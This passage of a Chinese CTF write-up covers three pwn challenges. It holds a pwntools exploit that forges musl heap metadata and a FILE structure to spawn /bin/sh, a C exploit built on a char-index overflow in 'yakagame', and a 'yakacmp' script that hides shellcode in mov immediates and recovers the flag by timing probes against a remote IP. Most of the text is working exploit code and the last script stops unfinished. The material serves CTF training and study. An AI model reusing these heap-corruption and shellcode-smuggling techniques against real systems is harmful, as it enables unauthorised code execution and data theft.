fake_meta += p64(ofl_head-0x8)+p64(fake_stdout_addr) #fakemta1
fake_meta +=p64(fakemeta_addr+0x40)+p64(0x3fe)+p64(0xa9)+p64(0)

fake_meta +=p64(fakemeta_addr+0x1000)+p64(0x0000c00000000000)
fake_meta +=p64(fakemeta_addr)+p64(0x0000800000000009)
fake_meta +=b"AAAAAAAA"
fake_meta = fake_meta.ljust((0x2000-0x20),b'\x00')
fake_meta +=p64(secret)+p64(0)*3 #fake_area1
fake_meta += p64(0)+p64(0)+p64(fakemeta_addr+0x30)+p64(0x0)+p64(0x3c0)+p64(0) #fakemeta2

# Forged FILE: "/bin/sh" at offset 0 and system as the function pointers.
fake_stdfile =b'/bin/sh\x00'+p64(0)<em>6+p64(1)</em>2+p64(system)*2
fake_stdfile = fake_stdfile.ljust(0x50,b'\x00')
# sendafter (not sendlineafter): the payload is binary and must not get a newline.
ch(1)
r.sendlineafter("Id:",str(7))
r.sendlineafter("length:",str(0x2030))
r.sendafter("UserName:",fake_meta)

#context.log_level = 'debug'

check(2)
r.recv(2)
for i in range(20):
print(hex(u64(r.recv(8))) , hex(u64(r.recv(8))))
free(2)
r.sendline("2")
r.sendlineafter("Id:",str(2))
r.sendline("1")
r.sendlineafter("Id:",str(9))
r.sendlineafter("length:",str(0x58))
r.sendafter("UserName:",fake_stdfile)

# Menu choice 5: the exit path the text above refers to.
ch(5)

r.interactive()

```

最大问题在于，本地搭建的环境与远程不一致，导致一开始很多数据不一致。

flag{daa69d44-7a60-4cb2-b308-95cc27b93e98}

### yakagame
调用 fight、merge 等程序现有函数之外的函数时，首次调用会用 map 存储；第二次调用该函数时会用迭代器遍历 map，这个过程使用的索引 v33 是 char 类型，会溢出为负数，进而修改 cmd 和 score。
![](https://i.imgur.com/uuChCRu.png)
exp.c
```c
#include <stdio.h>

/* 256 one-byte weapon slots shared by every stub below; slot 0 is the only one
 * the stubs touch. */
char weaponlist[0x100];

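/* Stand-in for the game's fight handler: logs the call and reports success.
 * idx is accepted for signature compatibility and otherwise unused.
 * (The pasted original had curly quotes around the format string, which does
 * not compile; restored here.) */
int fight(int idx) {
    (void)idx;
    printf("fight\n");
    return 1;
}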

/* Add weapon src's value into weapon dst's slot (byte arithmetic, wraps). */
void merge(int dst, int src) {
    char *target = &weaponlist[dst];
    *target = (char)(*target + weaponlist[src]);
}
/* Overwrite slot 0 with num. */
void upgrade(char num) {
    char *slot0 = weaponlist;
    *slot0 = num;
}
/* Clear slot 0; num is accepted and ignored, as in the original. */
void newweapon(int num) {
    (void)num;
    *weaponlist = 0;
}
/* Clear slot 0 (same effect as newweapon, but takes no argument). */
void tiandongwanxiang() {
    *weaponlist = '\0';
}
/* Two hundred and twenty identical stubs, newweapon0 .. newweapon219, each
 * clearing slot 0 of weaponlist; generated with a macro instead of being
 * spelled out one by one.  num is accepted and ignored, as in the originals. */
#define NEWWEAPON_STUB(n) void newweapon##n(int num) { weaponlist[0] = 0; }
NEWWEAPON_STUB(0) NEWWEAPON_STUB(1) NEWWEAPON_STUB(2) NEWWEAPON_STUB(3) NEWWEAPON_STUB(4) NEWWEAPON_STUB(5) NEWWEAPON_STUB(6) NEWWEAPON_STUB(7) NEWWEAPON_STUB(8) NEWWEAPON_STUB(9)
NEWWEAPON_STUB(10) NEWWEAPON_STUB(11) NEWWEAPON_STUB(12) NEWWEAPON_STUB(13) NEWWEAPON_STUB(14) NEWWEAPON_STUB(15) NEWWEAPON_STUB(16) NEWWEAPON_STUB(17) NEWWEAPON_STUB(18) NEWWEAPON_STUB(19)
NEWWEAPON_STUB(20) NEWWEAPON_STUB(21) NEWWEAPON_STUB(22) NEWWEAPON_STUB(23) NEWWEAPON_STUB(24) NEWWEAPON_STUB(25) NEWWEAPON_STUB(26) NEWWEAPON_STUB(27) NEWWEAPON_STUB(28) NEWWEAPON_STUB(29)
NEWWEAPON_STUB(30) NEWWEAPON_STUB(31) NEWWEAPON_STUB(32) NEWWEAPON_STUB(33) NEWWEAPON_STUB(34) NEWWEAPON_STUB(35) NEWWEAPON_STUB(36) NEWWEAPON_STUB(37) NEWWEAPON_STUB(38) NEWWEAPON_STUB(39)
NEWWEAPON_STUB(40) NEWWEAPON_STUB(41) NEWWEAPON_STUB(42) NEWWEAPON_STUB(43) NEWWEAPON_STUB(44) NEWWEAPON_STUB(45) NEWWEAPON_STUB(46) NEWWEAPON_STUB(47) NEWWEAPON_STUB(48) NEWWEAPON_STUB(49)
NEWWEAPON_STUB(50) NEWWEAPON_STUB(51) NEWWEAPON_STUB(52) NEWWEAPON_STUB(53) NEWWEAPON_STUB(54) NEWWEAPON_STUB(55) NEWWEAPON_STUB(56) NEWWEAPON_STUB(57) NEWWEAPON_STUB(58) NEWWEAPON_STUB(59)
NEWWEAPON_STUB(60) NEWWEAPON_STUB(61) NEWWEAPON_STUB(62) NEWWEAPON_STUB(63) NEWWEAPON_STUB(64) NEWWEAPON_STUB(65) NEWWEAPON_STUB(66) NEWWEAPON_STUB(67) NEWWEAPON_STUB(68) NEWWEAPON_STUB(69)
NEWWEAPON_STUB(70) NEWWEAPON_STUB(71) NEWWEAPON_STUB(72) NEWWEAPON_STUB(73) NEWWEAPON_STUB(74) NEWWEAPON_STUB(75) NEWWEAPON_STUB(76) NEWWEAPON_STUB(77) NEWWEAPON_STUB(78) NEWWEAPON_STUB(79)
NEWWEAPON_STUB(80) NEWWEAPON_STUB(81) NEWWEAPON_STUB(82) NEWWEAPON_STUB(83) NEWWEAPON_STUB(84) NEWWEAPON_STUB(85) NEWWEAPON_STUB(86) NEWWEAPON_STUB(87) NEWWEAPON_STUB(88) NEWWEAPON_STUB(89)
NEWWEAPON_STUB(90) NEWWEAPON_STUB(91) NEWWEAPON_STUB(92) NEWWEAPON_STUB(93) NEWWEAPON_STUB(94) NEWWEAPON_STUB(95) NEWWEAPON_STUB(96) NEWWEAPON_STUB(97) NEWWEAPON_STUB(98) NEWWEAPON_STUB(99)
NEWWEAPON_STUB(100) NEWWEAPON_STUB(101) NEWWEAPON_STUB(102) NEWWEAPON_STUB(103) NEWWEAPON_STUB(104) NEWWEAPON_STUB(105) NEWWEAPON_STUB(106) NEWWEAPON_STUB(107) NEWWEAPON_STUB(108) NEWWEAPON_STUB(109)
NEWWEAPON_STUB(110) NEWWEAPON_STUB(111) NEWWEAPON_STUB(112) NEWWEAPON_STUB(113) NEWWEAPON_STUB(114) NEWWEAPON_STUB(115) NEWWEAPON_STUB(116) NEWWEAPON_STUB(117) NEWWEAPON_STUB(118) NEWWEAPON_STUB(119)
NEWWEAPON_STUB(120) NEWWEAPON_STUB(121) NEWWEAPON_STUB(122) NEWWEAPON_STUB(123) NEWWEAPON_STUB(124) NEWWEAPON_STUB(125) NEWWEAPON_STUB(126) NEWWEAPON_STUB(127) NEWWEAPON_STUB(128) NEWWEAPON_STUB(129)
NEWWEAPON_STUB(130) NEWWEAPON_STUB(131) NEWWEAPON_STUB(132) NEWWEAPON_STUB(133) NEWWEAPON_STUB(134) NEWWEAPON_STUB(135) NEWWEAPON_STUB(136) NEWWEAPON_STUB(137) NEWWEAPON_STUB(138) NEWWEAPON_STUB(139)
NEWWEAPON_STUB(140) NEWWEAPON_STUB(141) NEWWEAPON_STUB(142) NEWWEAPON_STUB(143) NEWWEAPON_STUB(144) NEWWEAPON_STUB(145) NEWWEAPON_STUB(146) NEWWEAPON_STUB(147) NEWWEAPON_STUB(148) NEWWEAPON_STUB(149)
NEWWEAPON_STUB(150) NEWWEAPON_STUB(151) NEWWEAPON_STUB(152) NEWWEAPON_STUB(153) NEWWEAPON_STUB(154) NEWWEAPON_STUB(155) NEWWEAPON_STUB(156) NEWWEAPON_STUB(157) NEWWEAPON_STUB(158) NEWWEAPON_STUB(159)
NEWWEAPON_STUB(160) NEWWEAPON_STUB(161) NEWWEAPON_STUB(162) NEWWEAPON_STUB(163) NEWWEAPON_STUB(164) NEWWEAPON_STUB(165) NEWWEAPON_STUB(166) NEWWEAPON_STUB(167) NEWWEAPON_STUB(168) NEWWEAPON_STUB(169)
NEWWEAPON_STUB(170) NEWWEAPON_STUB(171) NEWWEAPON_STUB(172) NEWWEAPON_STUB(173) NEWWEAPON_STUB(174) NEWWEAPON_STUB(175) NEWWEAPON_STUB(176) NEWWEAPON_STUB(177) NEWWEAPON_STUB(178) NEWWEAPON_STUB(179)
NEWWEAPON_STUB(180) NEWWEAPON_STUB(181) NEWWEAPON_STUB(182) NEWWEAPON_STUB(183) NEWWEAPON_STUB(184) NEWWEAPON_STUB(185) NEWWEAPON_STUB(186) NEWWEAPON_STUB(187) NEWWEAPON_STUB(188) NEWWEAPON_STUB(189)
NEWWEAPON_STUB(190) NEWWEAPON_STUB(191) NEWWEAPON_STUB(192) NEWWEAPON_STUB(193) NEWWEAPON_STUB(194) NEWWEAPON_STUB(195) NEWWEAPON_STUB(196) NEWWEAPON_STUB(197) NEWWEAPON_STUB(198) NEWWEAPON_STUB(199)
NEWWEAPON_STUB(200) NEWWEAPON_STUB(201) NEWWEAPON_STUB(202) NEWWEAPON_STUB(203) NEWWEAPON_STUB(204) NEWWEAPON_STUB(205) NEWWEAPON_STUB(206) NEWWEAPON_STUB(207) NEWWEAPON_STUB(208) NEWWEAPON_STUB(209)
NEWWEAPON_STUB(210) NEWWEAPON_STUB(211) NEWWEAPON_STUB(212) NEWWEAPON_STUB(213) NEWWEAPON_STUB(214) NEWWEAPON_STUB(215) NEWWEAPON_STUB(216) NEWWEAPON_STUB(217) NEWWEAPON_STUB(218) NEWWEAPON_STUB(219)
#undef NEWWEAPON_STUB
void newweapon220(int num) {weaponlist[0]=0;} void newweapon221(int num) {weaponlist[0]=0;} void newweapon222(int num) {weaponlist[0]=0;} void newweapon223(int num) {weaponlist[0]=0;} void newweapon224(int num) {weaponlist[0]=0;} void newweapon225(int num) {weaponlist[0]=0;} void newweapon226(int num) {weaponlist[0]=0;} void newweapon227(int num) {weaponlist[0]=0;} void newweapon228(int num) {weaponlist[0]=0;} void newweapon229(int num) {weaponlist[0]=0;} void newweapon230(int num) {weaponlist[0]=0;} void newweapon231(int num) {weaponlist[0]=0;} void newweapon232(int num) {weaponlist[0]=0;} void newweapon233(int num) {weaponlist[0]=0;} void newweapon234(int num) {weaponlist[0]=0;} void newweapon235(int num) {weaponlist[0]=0;} void newweapon236(int num) {weaponlist[0]=0;} void newweapon237(int num) {weaponlist[0]=0;} void newweapon238(int num) {weaponlist[0]=0;} void newweapon239(int num) {weaponlist[0]=0;}
void newweapon240(int num) {weaponlist[0]=0;} void newweapon241(int num) {weaponlist[0]=0;} void newweapon242(int num) {weaponlist[0]=0;} void newweapon243(int num) {weaponlist[0]=0;} void newweapon244(int num) {weaponlist[0]=0;} void newweapon245(int num) {weaponlist[0]=0;} void newweapon246(int num) {weaponlist[0]=0;} void newweapon247(int num) {weaponlist[0]=0;} void newweapon248(int num) {weaponlist[0]=0;} void newweapon249(int num) {weaponlist[0]=0;} void newweapon250(int num) {weaponlist[0]=0;} void newweapon251(int num) {weaponlist[0]=0;} void newweapon252(int num) {weaponlist[0]=0;} void newweapon253(int num) {weaponlist[0]=0;} void newweapon254(int num) {weaponlist[0]=0;} void newweapon255(int num) {weaponlist[0]=0;} void newweapon256(int num) {weaponlist[0]=0;} void newweapon257(int num) {weaponlist[0]=0;} void newweapon258(int num) {weaponlist[0]=0;} void newweapon259(int num) {weaponlist[0]=0;}
void newweapon260(int num) {weaponlist[0]=0;} void newweapon261(int num) {weaponlist[0]=0;} void newweapon262(int num) {weaponlist[0]=0;} void newweapon263(int num) {weaponlist[0]=0;} void newweapon264(int num) {weaponlist[0]=0;} void newweapon265(int num) {weaponlist[0]=0;} void newweapon266(int num) {weaponlist[0]=0;} void newweapon267(int num) {weaponlist[0]=0;} void newweapon268(int num) {weaponlist[0]=0;} void newweapon269(int num) {weaponlist[0]=0;} void newweapon270(int num) {weaponlist[0]=0;} void newweapon271(int num) {weaponlist[0]=0;} void newweapon272(int num) {weaponlist[0]=0;} void newweapon273(int num) {weaponlist[0]=0;} void newweapon274(int num) {weaponlist[0]=0;} void newweapon275(int num) {weaponlist[0]=0;} void newweapon276(int num) {weaponlist[0]=0;} void newweapon277(int num) {weaponlist[0]=0;} void newweapon278(int num) {weaponlist[0]=0;} void newweapon279(int num) {weaponlist[0]=0;}
void newweapon280(int num) {weaponlist[0]=0;} void newweapon281(int num) {weaponlist[0]=0;} void newweapon282(int num) {weaponlist[0]=0;} void newweapon283(int num) {weaponlist[0]=0;} void newweapon284(int num) {weaponlist[0]=0;} void newweapon285(int num) {weaponlist[0]=0;} void newweapon286(int num) {weaponlist[0]=0;} void newweapon287(int num) {weaponlist[0]=0;} void newweapon288(int num) {weaponlist[0]=0;} void newweapon289(int num) {weaponlist[0]=0;} void newweapon290(int num) {weaponlist[0]=0;} void newweapon291(int num) {weaponlist[0]=0;} void newweapon292(int num) {weaponlist[0]=0;} void newweapon293(int num) {weaponlist[0]=0;} void newweapon294(int num) {weaponlist[0]=0;} void newweapon295(int num) {weaponlist[0]=0;} void newweapon296(int num) {weaponlist[0]=0;} void newweapon297(int num) {weaponlist[0]=0;} void newweapon298(int num) {weaponlist[0]=0;} void newweapon299(int num) {weaponlist[0]=0;}
void newweapon300(int num) {weaponlist[0]=0;} void newweapon301(int num) {weaponlist[0]=0;} void newweapon302(int num) {weaponlist[0]=0;} void newweapon303(int num) {weaponlist[0]=0;} void newweapon304(int num) {weaponlist[0]=0;} void newweapon305(int num) {weaponlist[0]=0;} void newweapon306(int num) {weaponlist[0]=0;} void newweapon307(int num) {weaponlist[0]=0;} void newweapon308(int num) {weaponlist[0]=0;} void newweapon309(int num) {weaponlist[0]=0;} void newweapon310(int num) {weaponlist[0]=0;} void newweapon311(int num) {weaponlist[0]=0;} void newweapon312(int num) {weaponlist[0]=0;} void newweapon313(int num) {weaponlist[0]=0;} void newweapon314(int num) {weaponlist[0]=0;} void newweapon315(int num) {weaponlist[0]=0;} void newweapon316(int num) {weaponlist[0]=0;} void newweapon317(int num) {weaponlist[0]=0;} void newweapon318(int num) {weaponlist[0]=0;} void newweapon319(int num) {weaponlist[0]=0;}
void newweapon320(int num) {weaponlist[0]=0;} void newweapon321(int num) {weaponlist[0]=0;} void newweapon322(int num) {weaponlist[0]=0;} void newweapon323(int num) {weaponlist[0]=0;} void newweapon324(int num) {weaponlist[0]=0;} void newweapon325(int num) {weaponlist[0]=0;} void newweapon326(int num) {weaponlist[0]=0;} void newweapon327(int num) {weaponlist[0]=0;} void newweapon328(int num) {weaponlist[0]=0;} void newweapon329(int num) {weaponlist[0]=0;} void newweapon330(int num) {weaponlist[0]=0;} void newweapon331(int num) {weaponlist[0]=0;} void newweapon332(int num) {weaponlist[0]=0;} void newweapon333(int num) {weaponlist[0]=0;} void newweapon334(int num) {weaponlist[0]=0;} void newweapon335(int num) {weaponlist[0]=0;} void newweapon336(int num) {weaponlist[0]=0;} void newweapon337(int num) {weaponlist[0]=0;} void newweapon338(int num) {weaponlist[0]=0;} void newweapon339(int num) {weaponlist[0]=0;}
void newweapon340(int num) {weaponlist[0]=0;} void newweapon341(int num) {weaponlist[0]=0;} void newweapon342(int num) {weaponlist[0]=0;} void newweapon343(int num) {weaponlist[0]=0;} void newweapon344(int num) {weaponlist[0]=0;} void newweapon345(int num) {weaponlist[0]=0;} void newweapon346(int num) {weaponlist[0]=0;} void newweapon347(int num) {weaponlist[0]=0;} void newweapon348(int num) {weaponlist[0]=0;} void newweapon349(int num) {weaponlist[0]=0;} void newweapon350(int num) {weaponlist[0]=0;} void newweapon351(int num) {weaponlist[0]=0;} void newweapon352(int num) {weaponlist[0]=0;} void newweapon353(int num) {weaponlist[0]=0;} void newweapon354(int num) {weaponlist[0]=0;} void newweapon355(int num) {weaponlist[0]=0;} void newweapon356(int num) {weaponlist[0]=0;} void newweapon357(int num) {weaponlist[0]=0;} void newweapon358(int num) {weaponlist[0]=0;} void newweapon359(int num) {weaponlist[0]=0;}
void newweapon360(int num) {weaponlist[0]=0;} void newweapon361(int num) {weaponlist[0]=0;} void newweapon362(int num) {weaponlist[0]=0;} void newweapon363(int num) {weaponlist[0]=0;} void newweapon364(int num) {weaponlist[0]=0;} void newweapon365(int num) {weaponlist[0]=0;} void newweapon366(int num) {weaponlist[0]=0;} void newweapon367(int num) {weaponlist[0]=0;} void newweapon368(int num) {weaponlist[0]=0;} void newweapon369(int num) {weaponlist[0]=0;} void newweapon370(int num) {weaponlist[0]=0;} void newweapon371(int num) {weaponlist[0]=0;} void newweapon372(int num) {weaponlist[0]=0;} void newweapon373(int num) {weaponlist[0]=0;} void newweapon374(int num) {weaponlist[0]=0;} void newweapon375(int num) {weaponlist[0]=0;} void newweapon376(int num) {weaponlist[0]=0;} void newweapon377(int num) {weaponlist[0]=0;} void newweapon378(int num) {weaponlist[0]=0;} void newweapon379(int num) {weaponlist[0]=0;}
void newweapon380(int num) {weaponlist[0]=0;} void newweapon381(int num) {weaponlist[0]=0;} void newweapon382(int num) {weaponlist[0]=0;} void newweapon383(int num) {weaponlist[0]=0;} void newweapon384(int num) {weaponlist[0]=0;} void newweapon385(int num) {weaponlist[0]=0;} void newweapon386(int num) {weaponlist[0]=0;} void newweapon387(int num) {weaponlist[0]=0;} void newweapon388(int num) {weaponlist[0]=0;} void newweapon389(int num) {weaponlist[0]=0;} void newweapon390(int num) {weaponlist[0]=0;} void newweapon391(int num) {weaponlist[0]=0;} void newweapon392(int num) {weaponlist[0]=0;} void newweapon393(int num) {weaponlist[0]=0;} void newweapon394(int num) {weaponlist[0]=0;} void newweapon395(int num) {weaponlist[0]=0;} void newweapon396(int num) {weaponlist[0]=0;} void newweapon397(int num) {weaponlist[0]=0;} void newweapon398(int num) {weaponlist[0]=0;} void newweapon399(int num) {weaponlist[0]=0;}
/*
 * gamestart: seeds slots 0..399 through the newweaponN() setters, then
 * re-writes a handful of slots and calls upgrade()/fight().
 * Most slots get 115 (0x73).  Slots 31/32 and 307..321 receive 0 or
 * single-byte values (0x72 0x69 0x44, 0xe0 0x77, ...); what those bytes mean
 * depends on how weaponlist is consumed by upgrade()/fight(), which is outside
 * this excerpt — the trailing //446972 and //7776B0 comments look like
 * addresses, TODO confirm.
 * NOTE(review): on the two lines carrying those `//` comments the comment runs
 * to the end of the physical line, so as printed newweapon32..39 and
 * newweapon317..319 are NOT called in the first pass (a line break was
 * probably lost).  Slots 32 and 317..319 are re-written in the second pass
 * below; slots 33..39 are not.
 */
void gamestart(){
newweapon0(115); newweapon1(115); newweapon2(115); newweapon3(115); newweapon4(115); newweapon5(115); newweapon6(115); newweapon7(115); newweapon8(115); newweapon9(115); newweapon10(115); newweapon11(115); newweapon12(115); newweapon13(115); newweapon14(115); newweapon15(115); newweapon16(115); newweapon17(115); newweapon18(115); newweapon19(115);
newweapon20(115); newweapon21(115); newweapon22(115); newweapon23(115); newweapon24(115); newweapon25(115); newweapon26(115); newweapon27(115); newweapon28(115); newweapon29(115); newweapon30(115); newweapon31(0); //446972 newweapon32(0); newweapon33(115); newweapon34(115); newweapon35(115); newweapon36(115); newweapon37(115); newweapon38(115); newweapon39(115);
newweapon40(115); newweapon41(115); newweapon42(115); newweapon43(115); newweapon44(115); newweapon45(115); newweapon46(115); newweapon47(115); newweapon48(115); newweapon49(115); newweapon50(115); newweapon51(115); newweapon52(115); newweapon53(115); newweapon54(115); newweapon55(115); newweapon56(115); newweapon57(115); newweapon58(115); newweapon59(115);
newweapon60(115); newweapon61(115); newweapon62(115); newweapon63(115); newweapon64(115); newweapon65(115); newweapon66(115); newweapon67(115); newweapon68(115); newweapon69(115); newweapon70(115); newweapon71(115); newweapon72(115); newweapon73(115); newweapon74(115); newweapon75(115); newweapon76(115); newweapon77(115); newweapon78(115); newweapon79(115);
newweapon80(115); newweapon81(115); newweapon82(115); newweapon83(115); newweapon84(115); newweapon85(115); newweapon86(115); newweapon87(115); newweapon88(115); newweapon89(115); newweapon90(115); newweapon91(115); newweapon92(115); newweapon93(115); newweapon94(115); newweapon95(115); newweapon96(115); newweapon97(115); newweapon98(115); newweapon99(115);
newweapon100(115); newweapon101(115); newweapon102(115); newweapon103(115); newweapon104(115); newweapon105(115); newweapon106(115); newweapon107(115); newweapon108(115); newweapon109(115); newweapon110(115); newweapon111(115); newweapon112(115); newweapon113(115); newweapon114(115); newweapon115(115); newweapon116(115); newweapon117(115); newweapon118(115); newweapon119(115);
newweapon120(115); newweapon121(115); newweapon122(115); newweapon123(115); newweapon124(115); newweapon125(115); newweapon126(115); newweapon127(115); newweapon128(115); newweapon129(115); newweapon130(115); newweapon131(115); newweapon132(115); newweapon133(115); newweapon134(115); newweapon135(115); newweapon136(115); newweapon137(115); newweapon138(115); newweapon139(115);
newweapon140(115); newweapon141(115); newweapon142(115); newweapon143(115); newweapon144(115); newweapon145(115); newweapon146(115); newweapon147(115); newweapon148(115); newweapon149(115); newweapon150(115); newweapon151(115); newweapon152(115); newweapon153(115); newweapon154(115); newweapon155(115); newweapon156(115); newweapon157(115); newweapon158(115); newweapon159(115);
newweapon160(115); newweapon161(115); newweapon162(115); newweapon163(115); newweapon164(115); newweapon165(115); newweapon166(115); newweapon167(115); newweapon168(115); newweapon169(115); newweapon170(115); newweapon171(115); newweapon172(115); newweapon173(115); newweapon174(115); newweapon175(115); newweapon176(115); newweapon177(115); newweapon178(115); newweapon179(115);
newweapon180(115); newweapon181(115); newweapon182(115); newweapon183(115); newweapon184(115); newweapon185(115); newweapon186(115); newweapon187(115); newweapon188(115); newweapon189(115); newweapon190(115); newweapon191(115); newweapon192(115); newweapon193(115); newweapon194(115); newweapon195(115); newweapon196(115); newweapon197(115); newweapon198(115); newweapon199(115);
newweapon200(115); newweapon201(115); newweapon202(115); newweapon203(115); newweapon204(115); newweapon205(115); newweapon206(115); newweapon207(115); newweapon208(115); newweapon209(115); newweapon210(115); newweapon211(115); newweapon212(115); newweapon213(115); newweapon214(115); newweapon215(115); newweapon216(115); newweapon217(115); newweapon218(115); newweapon219(115);
newweapon220(115); newweapon221(115); newweapon222(115); newweapon223(115); newweapon224(115); newweapon225(115); newweapon226(115); newweapon227(115); newweapon228(115); newweapon229(115); newweapon230(115); newweapon231(115); newweapon232(115); newweapon233(115); newweapon234(115); newweapon235(115); newweapon236(115); newweapon237(115); newweapon238(115); newweapon239(115);
newweapon240(115); newweapon241(115); newweapon242(115); newweapon243(115); newweapon244(115); newweapon245(115); newweapon246(115); newweapon247(115); newweapon248(115); newweapon249(115); newweapon250(115); newweapon251(115); newweapon252(115); newweapon253(115); newweapon254(115); newweapon255(115); newweapon256(115); newweapon257(115); newweapon258(115); newweapon259(115);
newweapon260(115); newweapon261(115); newweapon262(115); newweapon263(115); newweapon264(115); newweapon265(115); newweapon266(115); newweapon267(115); newweapon268(115); newweapon269(115); newweapon270(115); newweapon271(115); newweapon272(115); newweapon273(115); newweapon274(115); newweapon275(115); newweapon276(115); newweapon277(115); newweapon278(115); newweapon279(115);
newweapon280(115); newweapon281(115); newweapon282(115); newweapon283(115); newweapon284(115); newweapon285(115); newweapon286(115); newweapon287(115); newweapon288(115); newweapon289(115); newweapon290(115); newweapon291(115); newweapon292(115); newweapon293(115); newweapon294(115); newweapon295(115); newweapon296(115); newweapon297(115); newweapon298(115); newweapon299(115);
newweapon300(115); newweapon301(115); newweapon302(115); newweapon303(115); newweapon304(115); newweapon305(115); newweapon306(115); newweapon307(0x72); newweapon308(0x69); newweapon309(0x44); newweapon310(0); newweapon311(0); newweapon312(0); newweapon313(0); newweapon314(0x00); newweapon315(0xe0); newweapon316(0x77); //7776B0 newweapon317(0); newweapon318(0); newweapon319(0);
newweapon320(0); newweapon321(0); newweapon322(115); newweapon323(115); newweapon324(115); newweapon325(115); newweapon326(115); newweapon327(115); newweapon328(115); newweapon329(115); newweapon330(115); newweapon331(115); newweapon332(115); newweapon333(115); newweapon334(115); newweapon335(115); newweapon336(115); newweapon337(115); newweapon338(115); newweapon339(115);
newweapon340(115); newweapon341(115); newweapon342(115); newweapon343(115); newweapon344(115); newweapon345(115); newweapon346(115); newweapon347(115); newweapon348(115); newweapon349(115); newweapon350(115); newweapon351(115); newweapon352(115); newweapon353(115); newweapon354(115); newweapon355(115); newweapon356(115); newweapon357(115); newweapon358(115); newweapon359(115);
newweapon360(115); newweapon361(115); newweapon362(115); newweapon363(115); newweapon364(115); newweapon365(115); newweapon366(115); newweapon367(115); newweapon368(115); newweapon369(115); newweapon370(115); newweapon371(115); newweapon372(115); newweapon373(115); newweapon374(115); newweapon375(115); newweapon376(115); newweapon377(115); newweapon378(115); newweapon379(115);
newweapon380(115); newweapon381(115); newweapon382(115); newweapon383(115); newweapon384(115); newweapon385(115); newweapon386(115); newweapon387(115); newweapon388(115); newweapon389(115); newweapon390(115); newweapon391(115); newweapon392(115); newweapon393(115); newweapon394(115); newweapon395(115); newweapon396(115); newweapon397(115); newweapon398(115); newweapon399(115);

/* second pass: slots 307..313 and 31 go back to 115 ... */
newweapon307(115);
newweapon308(115);
newweapon309(115);
newweapon31(115);
newweapon310(115);
newweapon311(115);
newweapon312(115);
newweapon313(115);

/* ... and 314..320 plus 32 become the byte sequence 00 00 40 00 00 00 / 00 00 */
newweapon314(0x00);
newweapon315(0x00);
newweapon316(0x40);
newweapon317(0x00);
newweapon318(0x00);
newweapon319(0x00);
newweapon32(0x00);
newweapon320(0x00);
/* upgrade() and fight() are defined outside this excerpt; 0x7f's meaning is theirs. */
upgrade(0x7f);

fight(0);
}
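/*
 * Entry point: runs one fight() from state 0.  fight()'s return value was
 * captured into an unused local before; it is discarded explicitly now, and
 * the process always exits with status 0 as it did before.
 */
int main ( ) {
    fight(0);
    return 0;
}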

yakacmp

漏洞在于:当指令格式为 mov rx,imm(rx 是寄存器,imm 是立即数且 imm 不为 0)时,会多生成一段汇编 push imm,而 imm 是 __int64 类型。push imm 连同 push 的操作码本身只占 5 字节,这样 imm 的高 4 个字节就可以是任意机器码,利用这四个字节完成 orw。
write 系统调用被禁用,所以只能爆破 flag:我用 cmp 比较,若相同则一直跳转回 read,再利用 pwntools 设置的 timeout 判断该字符是否相同。

# -*- coding: utf-8 -*-
from pwn import *

# pwntools process-wide settings: tmux split pane for gdb.attach(), x86-64
# target, and debug-level logging (verbose I/O tracing — noisy when looping
# over many connections, but handy while working out the timeout heuristic).
context.terminal = ['tmux','splitw','-h']
context.arch="amd64"
context.log_level="debug"

import string
def debug(addr=-1,PIE=True):
    """Attach gdb to the module-level process ``p``.

    With no ``addr`` just attach; otherwise set one breakpoint at ``addr``,
    expressed relative to the image base when ``PIE`` is true and as an
    absolute address otherwise.
    """
    if addr == -1:
        gdb.attach(p)
        return
    if PIE:
        breakpoint_cmd = "b *$rebase({})".format(hex(addr))
    else:
        breakpoint_cmd = "b *{}".format(hex(addr))
    gdb.attach(p, breakpoint_cmd)

def GO(payload):
    """Feed a newline-separated program to the service, one line per prompt.

    The first line answers the "give me some code now" banner; each further
    line answers an "operation?" prompt.  Nothing terminates the program here —
    the caller sends 'NO' afterwards.
    """
    lines = payload.split('\n')
    p.recvuntil("me some code now")
    p.sendline(lines[0])
    for line in lines[1:]:
        p.sendlineafter("operation?", line)
#p = process("./yakacmp1")

def main(idx, char):
    """Probe one (position, character) guess against the remote service.

    Opens a fresh connection (bound to the module global ``p`` so GO()/debug()
    can use it), sends a program made of ``mov`` instructions whose 64-bit
    immediates carry the extra bytes described in the note above, then feeds
    two bytes of input.  Nothing is returned: the caller in ``__main__`` treats
    an exception (EOF/timeout on the pwntools side, presumably) as "wrong
    guess" and a clean return as "right guess".
    ``idx`` is masked into byte 5 of one immediate and ``ord(char)`` into
    byte 6 of another; every other constant is specific to this binary.
    """
    global p
    p = remote("59.110.212.61", 42542)
    #p=process("./yakacmp1")

    # 0x67616c66 is "flag" as a little-endian dword.
    payload = ""
    payload += '''mov r1,{}
'''.format((0x67616c66))
    payload +='''mov r1,r1
mov r1,r1
mov r1,r1
mov r1,r1
mov r1,r1
mov r1,r1
mov r1,r1
mov r1,r1
mov r1,r1
mov r1,r1
mov r1,0\n'''
    #payload += '''add r1,2\n'''  # mov -> 0
    #payload += '''sub r1,r1\n'''
    # The remaining immediates are the payload proper; the inline comments
    # are the author's and are kept as-is.
    payload += '''mov r1,{}
'''.format((0x5e006a5f23330002))
    payload += '''mov r2,{}
'''.format((0x50050f5800000002)) # read(3,buf,0x100)
    #payload += '''
    payload += '''mov r2,{}
'''.format((0x5f036a5e23330002))
    payload += "mov r1,0\n"
    payload += '''mov r2,{}
'''.format((0x50050f5a00000100))
    # mask clears byte 5, then idx is OR-ed into it
    payload += '''mov r1,{}
'''.format((0x595a006a23330002)&(0xffff00ffffffffff)|(idx<<(5*8))) # 00 idx
    #payload += "add r3,r4\n"
    payload += '''mov r1,{}
'''.format((0x118ad10023330002))
    # mask clears byte 6, then the guessed character is OR-ed into it
    payload += '''mov r1,{}
'''.format((0x5966fa8023330002)&(0xff00ffffffffffff)|(ord(char)<<(6*8))) #66 char
    payload += '''mov r1,{}
'''.format((0x595f407500000000)) #66 char
    payload += '''mov r1,{}
'''.format((0x59050f5800000000)) #66 char
    payload += '''mov r1,{}
'''.format((0x59e2ff5a233300e8)) #66 char
    payload += '''mov r1,{}
'''.format((0x59e2ff5800000000)) #66 char

    #debug(0x1AF0 )
    # Enter the program line by line, then 'NO' at the next prompt
    # (presumably "no more operations", which starts execution).
    GO(payload)
    p.sendlineafter("operation?",'NO')

    # Two bytes of input; whether these sends succeed is what __main__ keys on.
    sleep(1)
    p.send('a')
    p.send('a')

    #print(p.recv())

if __name__ == "__main__":
    # libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
    # flag = "flag{7"
    # flag = "flag{79274530-bb31-"
